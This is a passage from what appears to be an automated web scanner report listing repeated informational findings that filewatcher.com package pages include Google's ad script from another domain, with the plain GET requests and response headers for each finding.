Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32475.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XQHhaiGZ9CgvgEsKo0oLgA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1050. http://www.filewatcher.com/p/aub-2.0.5.tgz.32476.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32476.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32476.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "NSAnL/9OpC0bZK5Q+Vf0MQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1051. http://www.filewatcher.com/p/aub-2.0.5.tgz.32477.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32477.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32477.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "hEQqu4Q723d6hCKkvWHeXA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1052. http://www.filewatcher.com/p/aub-2.0.5.tgz.32478.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32478.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32478.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3XmmYljQLE0koPlBzoJFmA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1053. http://www.filewatcher.com/p/aub-2.0.5.tgz.32479.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32479.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32479.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0NzweGpfmdwiyyA1L7eayA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1054. http://www.filewatcher.com/p/aub-2.0.5.tgz.32480.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32480.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32480.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jttPoVzJS+8lmYEN5/7qyA"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 811
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1055. http://www.filewatcher.com/p/aub-2.0.5.tgz.32553.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32553.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32553.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "OIRfuAWYWCMQPJ7k3QqlHQ"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1056. http://www.filewatcher.com/p/aub-2.1.3.tar.gz.55334.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.1.3.tar.gz.55334.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.1.3.tar.gz.55334.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RvGBe/5JbVDbjE9OCRQNcw"
Content-Length: 5570
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.1.3.tar.gz/ - Package Brow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1057. http://www.filewatcher.com/p/aub-2.2.tbz.41730.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41730.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41730.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CiXuTRMgXbGRfiH7Kvql9w"
Content-Length: 5503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1058. http://www.filewatcher.com/p/aub-2.2.tbz.41785.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41785.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41785.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3aLHnuwucz1U5Ay2R3eXBA"
Content-Length: 5503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1059. http://www.filewatcher.com/p/aub-2.2.tbz.41893.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41893.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41893.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "q1SsWjQU1P3TEtddVjBP4g"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1060. http://www.filewatcher.com/p/aub-2.2.tbz.41895.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41895.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41895.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eJ18R8p2KAQ4cEsdHKGq/A"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1061. http://www.filewatcher.com/p/aub-2.2.tbz.41897.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41897.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41897.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wZEAWzQgeQONmOhwcRss9A"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1062. http://www.filewatcher.com/p/aub-2.2.tbz.41898.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41898.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41898.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "gg+WbshypNgdxsnAva7j8A"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1063. http://www.filewatcher.com/p/aub-2.2.tbz.41904.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41904.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41904.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qJFu1clJIFjt0hKz36+sTg"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1064. http://www.filewatcher.com/p/aub-2.2.tbz.41906.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41906.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41906.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Z8nT/Y8XDg+vjVs93R7Xow"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1065. http://www.filewatcher.com/p/aub-2.2.tbz.41911.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41911.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41911.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "p4MIKwKd+L5/T8oXDR2fQw"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 809
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1066. http://www.filewatcher.com/p/aub-2.2.tbz.41917.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41917.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41917.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IaYVCAtfcBaOmk/4vV5t8g"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1067. http://www.filewatcher.com/p/aub-2.2.tbz.41941.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.2.tbz.41941.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.2.tbz.41941.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "KSJHlcCSiEfbvLb+jkEJJQ"
Content-Length: 5506
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
